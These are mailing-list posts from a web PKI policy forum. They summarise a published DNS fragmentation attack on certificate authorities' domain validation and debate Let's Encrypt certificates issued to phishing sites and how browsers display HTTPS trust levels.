DNS fragmentation attack subverts DV, 5 public CAs vulnerable

2018-12-11 Thread Hector Martin via dev-security-policy
I figured this presentation might be of interest to this list:

https://i.blackhat.com/eu-18/Thu-Dec-6/eu-18-Heftrig-Off-Path-Attacks-Against-PKI.pdf

It seems they found 5 (unspecified) public CAs out of 17 tested were
vulnerable to this attack, which can be performed by an off-path attacker.

The TL;DR is you can force fragmentation by spoofing ICMP fragmentation
needed packets, and then cause the DNS answer to be split into two
fragments, one with all the actual anti-spoofing relevant information
(TXID, UDP source port, etc), and one with the actual DNS answer data of
interest. Then all you have to do is guess the IPID and keep the UDP
checksum valid, both of which are practical, and you can spoof the
second fragment with whatever you want.

Yet another reason to push for DNSSEC everywhere (and pervasive use of
CAA records to reduce attack surface). This is scary enough I think CAs
should be required to implement practical mitigations.

Thoughts?
-- 
Hector Martin (mar...@marcan.st)
Public Key: https://mrcn.st/pub
___
dev-security-policy mailing list
dev-security-policy@lists.mozilla.org
https://lists.mozilla.org/listinfo/dev-security-policy


Re: Over 14K 'Let's Encrypt' SSL Certificates Issued To PayPal Phishing Sites

2017-03-30 Thread Hector Martin via dev-security-policy
On 2017-03-30 23:30, Alex Gaynor via dev-security-policy wrote:
>>> 1. HTTP
>>> 2. "I explicitly asked for security and didn't get it" (HTTPS with no
>>> validation)
>>> 3. HTTPS
> 
> You're not wrong that (2) is better than (1). It's also indistinguishable
> from a downgrade attack from (3).

But so is (1) if the URI didn't come from somewhere that already
requested HTTPS. Enter HSTS, etc. Ultimately, yes, ideally we'd have had
something like HSTS levels for each trust level, plus matching URI
schemes or some other way of requesting a minimum trust level in the URI.

> If we got to do the web all over again, I think we'd make the UX for (1)
> have an interstitial, or just not exist. Unfortunately, we're paying down
> two decades of technical debt :-)

Indeed. This is something that was a day 1 design flaw in HTTPS (with
the UX as implemented). The moment you start throwing up big scary
warnings for self-signed certs and not for HTTP, you've lost, because
the people with certs aren't going to want to become susceptible to
downgrade attacks. Though browser makers have progressively made this
worse by making the warning scarier and scarier.

Ah well, we are where we are. I'm grateful I can finally nuke a couple
random personal CAs and just Let's Encrypt everything, with HSTS. With
any luck browsers will start significantly penalizing the HTTP UX and
we'll finally get on the path to ubiquitous encryption.

-- 
Hector Martin (mar...@marcan.st)
Public Key: https://mrcn.st/pub
___
dev-security-policy mailing list
dev-security-policy@lists.mozilla.org
https://lists.mozilla.org/listinfo/dev-security-policy


Re: Over 14K 'Let's Encrypt' SSL Certificates Issued To PayPal Phishing Sites

2017-03-29 Thread Hector Martin via dev-security-policy

On 28/03/17 08:23, Peter Gutmann via dev-security-policy wrote:

Martin Heaps via dev-security-policy  
writes:


This topic is frustrating in that there seems to be a wide attempt by people
to use one form of authentication (DV TLS) to verify another form of
authentication (EV TLS).


The overall problem is that browser vendors have decreed that you can't have
encryption unless you have a certificate, i.e. a CA-supplied magic token to
turn the crypto on.  Let's Encrypt was an attempt to kludge around this by
giving everyone one of these magic tokens.  Like a lot of other kludges, it
had negative consequences...


It's not a kludge, though. Let's Encrypt is not (merely) a workaround 
for the fact that self-signed certificates are basically considered 
worthless. If it were, it wouldn't meet BR rules. Let's Encrypt actively 
performs validation of domains, and in that respect is as legitimate as 
any other DV CA.


We actually have *five* levels of trust here:

1. HTTP
2. HTTPS with no validation (self-signed or anonymous ciphersuite)
3. HTTPS with DV
4. HTTPS with OV
5. HTTPS with EV

These are technically objective levels of trust (mostly). There is also 
a technically subjective tangential attribute:


a. Is not a phishing or malicious site.

Let's Encrypt aims to obsolete levels 1 and 2 by making 3 ubiquitously 
accessible.


The problem is that browser vendors have historically treated trust as 
binary, confounding (3), (4), and (a), mostly because the ecosystem at 
the time made it hard to get (3) without meeting (a). They also 
inexplicably treated (2) as worse than (1), which is of course nonsense, 
but I guess was driven by some sort of backwards thinking that "if you 
have security at all, you'd better have good security" (or, 
equivalently: "normal people don't need security, and a mediocre attempt 
at security implies Bad Evil Things Are Happening").


With time, certificates have become more accessible, everyone has come 
to agree that we all need security, and with that, that thinking has 
become obsolete. Getting a DV cert for a phishing site was by no means 
hard before Let's Encrypt. Now that Let's Encrypt is here, it's trivial.



So it's now being actively exploited... how could anyone *not* see this
coming?  How can anyone actually be surprised that this is now happening?  As
the late Bob Jueneman once said on the PKIX list (over a different PKI-related
topic), "it's like watching a train wreck in slow motion, one freeze-frame at
a time".  It's pre-ordained what's going to happen, the most you can do is
artificially delay its arrival.


And this question should be directed at browser vendors. After years of 
mistakenly educating users that "green lock = good, safe, secure, 
awesome, please type in all your passwords", how could they *not* see 
this coming?



The end nessecity is that the general public need to be educated [...]


Quoting Vesselin Bontchev, "if user education was going to work, it would have
worked by now".  And that was a decade ago.


This is strictly a presentation layer problem. We *know* what the 
various trust levels mean. We need to present them in a way that is 
*useful* to users.


Obvious answer? Make (1)-(2) big scary red, (3) neutral, (4) green, (5) 
full EV banner. (a) still correlates reasonably well with (4) and (5). 
HTTPS is no longer optional. All those phishing sites get a neutral URL 
bar. We've already educated users that their bank needs a green lock in 
the URL.


--
___
dev-security-policy mailing list
dev-security-policy@lists.mozilla.org
https://lists.mozilla.org/listinfo/dev-security-policy